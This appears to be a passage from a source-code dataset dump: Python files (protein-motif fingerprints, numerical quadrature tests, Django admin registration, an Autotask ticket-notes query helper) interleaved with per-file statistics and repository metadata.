', trg_index = 'i') bond4.add_target_atom( atomname = ' O ', anyseqdist = True) residue3 = antiparallel_beta_cwc.add_residue( sequence_move = 1, end_of_motif = False, index = 'q') residue4 = antiparallel_beta_cwc.add_residue( bond_move = 'g', end_of_motif = False, index = 'r') bond5 = residue4.add_bond( required = True, src_atom = ' H ', trg_index = 'g') bond5.add_target_atom( atomname = ' O ', anyseqdist = True) bond6 = residue4.add_bond( required = True, src_atom = ' O ', trg_index = 'g') bond6.add_target_atom( atomname = ' H ', anyseqdist = True) residue5 = antiparallel_beta_cwc.add_residue( sequence_move = 1, end_of_motif = False, index = 'g') bond7 = residue5.add_bond( required = True, src_atom = ' O ', trg_index = 'r') bond7.add_target_atom( atomname = ' H ', anyseqdist = True) bond8 = residue5.add_bond( required = True, src_atom = ' H ', trg_index = 'r') bond8.add_target_atom( atomname = ' O ', anyseqdist = True) residue6 = antiparallel_beta_cwc.add_residue( sequence_move = 1, end_of_motif = False, index = 'h') residue7 = antiparallel_beta_cwc.add_residue( sequence_move = 2, end_of_motif = False, index = 'i') bond9 = residue7.add_bond( required = True, src_atom = ' O ', trg_index = 'p') bond9.add_target_atom( atomname = ' H ', anyseqdist = True) bond10 = residue7.add_bond( required = True, src_atom = ' H ', trg_index = 'p') bond10.add_target_atom( atomname = ' O ', anyseqdist = True) residue8 = antiparallel_beta_cwc.add_residue( bond_move = 'n', end_of_motif = False, index = 'k') bond11 = residue8.add_bond( required = True, src_atom = ' H ', trg_index = 'n') bond11.add_target_atom( atomname = ' O ', anyseqdist = True) residue9 = antiparallel_beta_cwc.add_residue( sequence_move = 6, end_of_motif = False, index = 'n') bond12 = residue9.add_bond( required = True, src_atom = ' O ', trg_index = 'k') bond12.add_target_atom( atomname = ' H ', anyseqdist = True) residue10 = antiparallel_beta_cwc.add_residue( bond_move = 'e', end_of_motif = False, index = 't') bond13 = residue10.add_bond( required = True, src_atom = ' H ', trg_index = 'e') bond13.add_target_atom( atomname = ' O ', anyseqdist = True) residue11 = antiparallel_beta_cwc.add_residue( sequence_move = 2, end_of_motif = False, index = 'e') bond14 = residue11.add_bond( required = True, src_atom = ' O ', trg_index = 't') bond14.add_target_atom( atomname = ' H ', anyseqdist = True) residue12 = antiparallel_beta_cwc.add_residue( end_of_motif = True, index = 'g') if __name__ == "__main__": cablam_fingerprints.make_pickle(antiparallel_beta_wcw) cablam_fingerprints.make_pickle(antiparallel_beta_cwc)
22.633136
81
0.665621
1,028
7,650
4.641051
0.092412
0.117376
0.088032
0.111507
0.920352
0.89017
0.866904
0.739258
0.687277
0.641794
0
0.024478
0.198954
7,650
337
82
22.700297
0.75408
0.047974
0
0.83165
0
0
0.058581
0.018152
0
0
0
0
0
1
0
false
0
0.006734
0
0.006734
0.020202
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
89fd5e7b827cbc8dfc54685256725b13d85146c3
22,334
py
Python
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
src/quadrature_test.py
rvanvenetie/stbem
6f79ed172fa085226a825a61927084c556743103
[ "MIT" ]
null
null
null
import itertools import numpy as np import quadpy from pytest import approx from scipy.special import exp1, expi from .parametrization import UnitSquare, circle from .quadrature import (DuffyScheme2D, DuffySchemeIdentical3D, DuffySchemeTouch3D, ProductScheme2D, ProductScheme3D, QuadpyScheme2D, gauss_quadrature_scheme, gauss_sqrtinv_quadrature_scheme, gauss_x_quadrature_scheme, log_log_quadrature_scheme, log_quadrature_scheme, sqrt_quadrature_scheme) from .quadrature_rules import (LOG_LOG_QUAD_RULES, LOG_QUAD_RULES, SQRT_QUAD_RULES) def test_quadrature(): for N_poly in [1, 3, 5, 7, 9, 11]: scheme = gauss_quadrature_scheme(N_poly) # Check that it integrates polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) def test_log_quadrature(): for N_poly, N_poly_log in LOG_QUAD_RULES: print(N_poly, N_poly_log) scheme = log_quadrature_scheme(N_poly, N_poly_log) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): print(k) f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) # Secondly, check that it integrates log polynomial exactly. for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(x) assert scheme.integrate(f, 0, 1) == approx(-1. / (1 + k)**2) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) def test_log_log_quadrature(): for N_poly, N_poly_log in LOG_LOG_QUAD_RULES: print(N_poly, N_poly_log) scheme = log_log_quadrature_scheme(N_poly, N_poly_log) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): print(k) f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) # Secondly, check that it integrates log(x) x^k exactly. for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(x) assert scheme.integrate(f, 0, 1) == approx(-1. / (1 + k)**2) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) # Secondly, check that it integrates log(1-x) x^k exactly. vals = [ -1, -(3 / 4), -(11 / 18), -(25 / 48), -(137 / 300), -(49 / 120), -(363 / 980), -(761 / 2240), -(7129 / 22680), -(7381 / 25200), -(83711 / 304920) ] for k in range(N_poly_log + 1): f = lambda x: x**k * np.log(1 - x) assert scheme.integrate(f, 0, 1) == approx(vals[k]) #assert scheme.integrate(f, 0, 3) == approx( # (3**(1 + k) * (-1 + np.log(3) + k * np.log(3))) / (1 + k)**2) def test_sqrt_quadrature(): for N_poly, N_poly_sqrt in SQRT_QUAD_RULES: scheme = sqrt_quadrature_scheme(N_poly, N_poly_sqrt) # First, check that it integrates polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1. / (1 + k)) assert scheme.integrate(f, 1, 5) == approx( (5**(k + 1) - 1.) / (1. + k)) # Secondly, check that it integrates log polynomial exactly. for k in range(N_poly_sqrt + 1): print(N_poly, N_poly_sqrt) f = lambda x: x**k * np.sqrt(x) assert scheme.integrate(f, 0, 1) == approx(2 / (2 * k + 3)) assert scheme.integrate(f, 0, 5) == approx( (2 * 5**(3 / 2 + k)) / (3 + 2 * k)) def test_gauss_sqrtinv_quadrature(): for N_poly in range(1, 21, 2): scheme = gauss_sqrtinv_quadrature_scheme(N_poly) # Check that it integrates weighted polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(2 / (1 + 2 * k)) assert scheme.integrate(f, 0, 5) == approx( (2 * 5**(1 + k)) / (1 + 2 * k)) def test_gauss_x_quadrature(): for N_poly in range(1, 21, 2): scheme = gauss_x_quadrature_scheme(N_poly) # Check that it integrates weighted polynomials exactly. for k in range(N_poly + 1): f = lambda x: x**k assert scheme.integrate(f, 0, 1) == approx(1 / (2 + k)) assert scheme.integrate(f, 0, 5) == approx(5**(1 + k) / (2 + k)) def test_product_quadrature(): for N_poly_x, N_poly_y in itertools.product([1, 3, 5, 7, 9, 11], [1, 3, 5, 7, 9, 11]): scheme_x = gauss_quadrature_scheme(N_poly_x) scheme_y = gauss_quadrature_scheme(N_poly_y) scheme = ProductScheme2D(scheme_x, scheme_y) for i in range(N_poly_x + 1): for j in range(N_poly_y + 1): f = lambda x: x[0]**i * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx(1. / (1 + i + j + i * j)) assert scheme.integrate(f, 2, 5, 3, 10) == approx( ((2**(1 + i) - 5**(1 + i)) * (3**(1 + j) - 10**(1 + j))) / ((1 + j) * (1 + i))) def test_quadpy_schemes(): for poly in range(11): quad_scheme = quadpy.c2.get_good_scheme(poly) scheme = QuadpyScheme2D(quad_scheme) for i in range(poly + 1): for j in range(poly + 1): if i + j >= poly: continue f = lambda x: x[0]**i * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx(1. / (1 + i + j + i * j)) assert scheme.integrate(f, 2, 5, 3, 10) == approx( ((2**(1 + i) - 5**(1 + i)) * (3**(1 + j) - 10**(1 + j))) / ((1 + j) * (1 + i))) def test_product_log_quadrature(): for N_log_poly_x, N_poly_y in itertools.product([1, 3, 5, 7, 9], [1, 3, 5, 7, 9, 11]): scheme_x = log_quadrature_scheme(N_log_poly_x, N_log_poly_x) scheme_y = gauss_quadrature_scheme(N_poly_y) scheme = ProductScheme2D(scheme_x, scheme_y) for i in range(N_log_poly_x + 1): for j in range(N_poly_y + 1): f = lambda x: x[0]**i * (1 + np.log(x[0])) * x[1]**j assert scheme.integrate(f, 0, 1, 0, 1) == approx( i / ((1 + i)**2 * (1 + j))) def test_duffy_quadrature(): for symmetric in [True, False]: f = lambda x: (x[0] - x[1])**2 * np.log((x[0] - x[1])**2) scheme_x = log_quadrature_scheme(3, 3) scheme_y = log_quadrature_scheme(2, 2) scheme = ProductScheme2D(scheme_x, scheme_y) duff_scheme = DuffyScheme2D(scheme, symmetric=symmetric) assert duff_scheme.integrate(f, 0, 1, 0, 1) == approx(-0.19444444444444444444, rel=1e-15, abs=0) def test_singular_quadrature(): def f(x): diff = (x[0] - x[1])**2 return np.exp(-diff) + (1 + diff) * expi(-diff) # Integrate over [0,1] x [0, 1]. val_exact = -1.87010542468505982755377882 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_23 = duff_scheme.integrate(f, 2, 3, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-15 # Integrate over [0,1] x [1,2] val_exact = -0.24318315547349982560 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) q_f_23 = duff_scheme.integrate(f, 1, 2, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-14 # Integrate over [0,2] x [2,3] val_exact = -0.24656642836945459944 rel_error = 1 for n in range(0, 13, 2): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 2, 2, 3) q_f_24 = duff_scheme.integrate(f, 1, 3, 3, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-9 # Integrate over [0,1] x [1,3] rel_error = 1 for n in range(0, 13, 2): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 3) q_f_24 = duff_scheme.integrate(f, 1, 2, 2, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-9 # Integrate over [0,1] x [2,3] val_exact = -0.0033832728959547738380 rel_error = 1 for n in range(1, 13): log_scheme = log_quadrature_scheme(n, n) prod_scheme = ProductScheme2D(log_scheme.mirror(), log_scheme) q_f = prod_scheme.integrate(f, 0, 1, 2, 3) q_f_24 = prod_scheme.integrate(f, 1, 2, 3, 4) assert q_f == approx(q_f_24) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error # Assert that some quadrature schemes work better than others. prod_mirror_scheme = ProductScheme2D(log_scheme, log_scheme) assert abs(prod_mirror_scheme.integrate(f, 0, 1, 2, 3) - val_exact) > abs(q_f - val_exact) assert rel_error < 1e-15 def test_singular_quadrature_circle(): def f(x): #return np.log(x[0] + 4 * x[1]) diff = circle(x[0]) - circle(x[1]) normsqr = np.sum(diff**2, axis=0) return np.exp(-normsqr) + (1 + normsqr) * expi(-normsqr) # Integrate over [0,1] x [0,1] val_exact = -1.87629901756723965199622242456 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_23 = duff_scheme.integrate(f, 1, 2, 1, 2) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # Integrate over [0,1] x [2pi - 1, 2pi] val_exact = -0.253663490380649986736253376122 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_y() q_f = duff_scheme.integrate(f, 0, 1, 2 * np.pi - 1, 2 * np.pi) q_f_23 = duff_scheme.integrate(f, 1, 2, 2 * np.pi, 2 * np.pi + 1) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # Integrate over [0,1] x [1, 2] rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) q_f_23 = duff_scheme.integrate(f, 1, 2, 2, 3) assert q_f == approx(q_f_23) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_quadrature_corner(): gamma = UnitSquare() def f(x): diff = gamma.eval(x[0]) - gamma.eval(x[1]) normsqr = np.sum(diff**2, axis=0) return np.exp(-normsqr) + (1 + normsqr) * expi(-normsqr) # Integrate over [0,1] x [0,1] val_exact = -1.87010542468505982755377882 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=True) q_f = duff_scheme.integrate(f, 0, 1, 0, 1) q_f_34 = duff_scheme.integrate(f, 3, 4, 3, 4) assert q_f == approx(q_f_34) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-15 # Integrate over [0,1] x [1,2] val_exact = -0.3718093426679699430449066 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_x() q_f = duff_scheme.integrate(f, 0, 1, 1, 2) assert q_f == approx(duff_scheme.integrate(f, 1, 2, 2, 3)) assert q_f == approx(duff_scheme.integrate(f, 2, 3, 3, 4)) assert q_f == approx(duff_scheme.integrate(f, 3, 4, 0, 1)) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 # Integrate over [1,2] x [0,1] rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffyScheme2D(ProductScheme2D(scheme, scheme), symmetric=False).mirror_y() q_f = duff_scheme.integrate(f, 1, 2, 0, 1) assert q_f == approx(duff_scheme.integrate(f, 2, 3, 1, 2)) assert q_f == approx(duff_scheme.integrate(f, 3, 4, 2, 3)) assert q_f == approx(duff_scheme.integrate(f, 0, 1, 3, 4)) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-15 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_duffy_3d_id(): b = 0.25 G_time = lambda xy: 1. / (4 * np.pi) * exp1(xy / (4 * b)) # Test with u0 = 1. u0 = lambda y: np.ones(y.shape[1]) h = 1 f = lambda xyz: u0(xyz) * G_time(h**2 * ((xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.075961144077555044645 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=False) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 h = 0.25 f = lambda xyz: u0(xyz) * G_time(h**2 * ((xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.0041485131062119699490 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=True) q_f = h**3 * duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 # Test with u0 = sin(x) * y u0 = lambda xy: np.sin(xy[0]) * xy[1] h = 0.25 vertices = [(1, 1), (1 - h, 1), (1, 1 - h), (1 - h, 1 - h)] v0, v1, v2 = [np.array(vtx).reshape(-1, 1) for vtx in vertices][0:3] # Make parametrization of the element Q. gamma_Q = lambda x, z: v0 + (v1 - v0) * x + (v2 - v0) * z gamma_K = lambda y: v0 + (v1 - v0) * y assert np.all(gamma_K(0) == v0) assert np.all(gamma_K(1) == v1) assert np.all(gamma_Q(0.5, 0) == gamma_K(0.5)) assert not np.all(gamma_Q(0.5, 1) == gamma_K(0.5)) #def f(xyz): # x, y, z = xyz # return u0(gamma_Q(x, z)) * G_time( # np.sum((gamma_Q(x, z) - gamma_Q(y, 0))**2, axis=0)) f = lambda xyz: u0(gamma_Q(xyz[0], xyz[2])) * G_time(h**2 * ( (xyz[0] - xyz[1])**2 + xyz[2]**2)) val_exact = 0.0028374980621858479108 rel_error = 1 for n in range(4, 12): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeIdentical3D(ProductScheme3D(scheme), symmetric_xy=False) fx = f(duff_scheme.points) q_f = h**3 * np.dot(fx, duff_scheme.weights) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 def test_singular_duffy_3d_touch(): # Test the touch quadrature rule. f = lambda xyz: np.log((xyz[0] + xyz[1])**2 + xyz[2]**2) val_exact = 0.1781673429530223041202893120098701898314 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 # Test the touch quadrature rule. f = lambda xyz: np.log(xyz[0]**2 + (xyz[1] + xyz[2])**2) val_exact = 0.1781673429530223041202893120098701898314 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 f = lambda xyz: np.log((xyz[0] + 2 * xyz[1])**2 + xyz[2]**2) val_exact = 0.80392693298465673176 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-12 rel_error = new_rel_error assert rel_error < 1e-12 f = lambda xyz: np.log((xyz[0] + 0.5 * xyz[1])**2 + xyz[2]**2) val_exact = -0.22999882492711279068 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) q_f = duff_scheme.integrate(f, 0, 1, 0, 1, 0, 1) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-11 rel_error = new_rel_error assert rel_error < 1e-11 v0 = np.array([1., 1.]).reshape(-1, 1) v1 = np.array([2, 1.]).reshape(-1, 1) v2 = np.array([0, 1]).reshape(-1, 1) v3 = np.array([1, 0]).reshape(-1, 1) h_elem = 1 h = 1 # Create parametrizations of Q and K. gamma_K = lambda y: v0 + (v1 - v0) * y gamma_Q = lambda x, z: v0 + (v2 - v0) * x + (v3 - v0) * z assert np.all(gamma_Q(0, 0) == gamma_K(0)) #u0 = lambda xy: np.ones(xy.shape[1]) #f = lambda xyz: u0(gamma_Q(xyz[0], xyz[2])) * G_time( # np.sum((gamma_Q(xyz[0], xyz[2]) - gamma_K(xyz[1]))**2, axis=0)) f = lambda xyz: 1 / (4 * np.pi) * exp1((xyz[0] + xyz[1])**2 + xyz[2]**2) #val_exact = 0.0201681640240317535810058111329 #val_exact = 0.02016816651934319 #val_exact = 0.020168166580447650 val_exact = 0.020168166583416268 rel_error = 1 for n in range(2, 13): scheme = log_quadrature_scheme(n, n) duff_scheme = DuffySchemeTouch3D(ProductScheme3D(scheme)) fx = f(duff_scheme.points) q_f = h_elem**2 * h * np.dot(fx, duff_scheme.weights) new_rel_error = abs((q_f - val_exact) / val_exact) print(n, new_rel_error) assert new_rel_error < rel_error or new_rel_error < 1e-11 rel_error = new_rel_error assert rel_error < 1e-11
39.953488
79
0.565998
3,395
22,334
3.503976
0.055965
0.114997
0.087845
0.054304
0.819183
0.785642
0.754455
0.746049
0.725286
0.71503
0
0.095115
0.307065
22,334
558
80
40.02509
0.673559
0.083371
0
0.645833
0
0
0
0
0
0
0
0
0.189815
1
0.041667
false
0
0.018519
0
0.06713
0.055556
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
c387f0b6ac0dc40d425f0904a905daf5ed3098d0
180
py
Python
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
squasha/server_side/user_profile/admin.py
ameerry1998/Squasha_trello_clone
74beacfd3a05c61121cd9acb1682ad11aff42fc8
[ "MIT" ]
null
null
null
from django.contrib import admin from django.contrib.auth.admin import UserAdmin from .models import User_Profile # Register your models here. admin.site.register(User_Profile)
20
47
0.822222
26
180
5.615385
0.538462
0.136986
0.232877
0
0
0
0
0
0
0
0
0
0.116667
180
8
48
22.5
0.918239
0.144444
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
c3f5c591f6447f2b1a2f939399e267d3ff3263c5
88
py
Python
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
src/v8unpack/MetaDataObject/CommonModules.py
fishca/v8unpack-1
51e1bb6b57be170f0c19be20649e18abdda04668
[ "MIT" ]
null
null
null
from ..MetaDataObject.core.Simple import Simple class CommonModules(Simple): pass
14.666667
47
0.772727
10
88
6.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.147727
88
5
48
17.6
0.906667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
7f03b7768499d78a702724ddeabe81fc74c838d4
135
py
Python
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
381
2018-08-18T03:37:22.000Z
2022-02-06T23:57:36.000Z
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
16
2018-09-22T18:12:47.000Z
2022-02-22T20:03:59.000Z
rpython/jit/backend/zarch/test/test_ztranslation_basic.py
nanjekyejoannah/pypy
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
[ "Apache-2.0", "OpenSSL" ]
55
2015-08-16T02:41:30.000Z
2022-03-20T20:33:35.000Z
from rpython.jit.backend.llsupport.test.ztranslation_test import TranslationTest class TestTranslationZARCH(TranslationTest): pass
33.75
80
0.859259
14
135
8.214286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.081481
135
3
81
45
0.927419
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
7f03cd5acb9ac4b1d61937350f94e1f944bd69a7
19
py
Python
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
coge/__init__.py
asherkhb/PyCoGe_API
ad9e642399127187d9078585a4e65dd9df05f3f7
[ "BSD-3-Clause" ]
null
null
null
from coge import *
9.5
18
0.736842
3
19
4.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.210526
19
1
19
19
0.933333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7f1178b3e6ef0dde3e017ab52fc5e0e8835d3a09
3,478
py
Python
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
null
null
null
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
3
2020-03-24T17:35:36.000Z
2021-02-02T22:12:56.000Z
PqrUploadModule/notes.py
petronije2002/PqrUpload
db22af08dac1243569e5f3dd8cdb4e010b215878
[ "MIT" ]
null
null
null
# Here is the list of modules we need to import # from . import authorizations from authorizations import at,at_url,headers_at,encoded_u,encoded_u_td,td_base_url,get_headers import atws import atws.monkeypatch.attributes import pandas as pd import requests def get_notes_for_list_of_note_ids(id_=[]): query_notes=atws.Query('TicketNote') query_notes.open_bracket('AND') if len(id_)==1: query_notes.WHERE('id',query_notes.Equals,id_[0]) # query_notes.AND('NoteType',query_notes.Equals,3) #at.picklist['TicketNote']['NoteType']['Task Notes'] else: query_notes.WHERE('id',query_notes.Equals,id_[0]) # query_notes.AND('NoteType',query_notes.Equals,3) #at.picklist['TicketNote']['NoteType']['Task Notes'] for element in id_[1:]: query_notes.OR('id',query_notes.Equals,element) query_notes.close_bracket() query_notes.open_bracket('AND') query_notes.AND('NoteType',query_notes.NotEqual,13) query_notes.AND('Publish',query_notes.Equals,1) query_notes.close_bracket() notes = at.query(query_notes).fetch_all() df = pd.DataFrame([dict(note) for note in notes]) return df,notes # def get_ticket_notes_at(id_=[0]): # """ # Returns all notes, belonging to the tickets from the given list. # Parameters: # id_ [list]: list of Autotask ticket ids # at [Autotask connect object] : Autotask atws.connect object # Returns: # Tuple: (Python DataFrame, list of notes) # """ # query_notes=atws.Query('TicketNote') # query_notes.AND('NoteType',query_notes.Equals,3) # if len(id_)==1: # query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) # else: # query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) # for element in id_[1:]: # query_notes.OR('TicketID',query_notes.Equals,element) # notes = at.query(query_notes).fetch_all() # df = pd.DataFrame([dict(note) for note in notes]) # return df,notes def 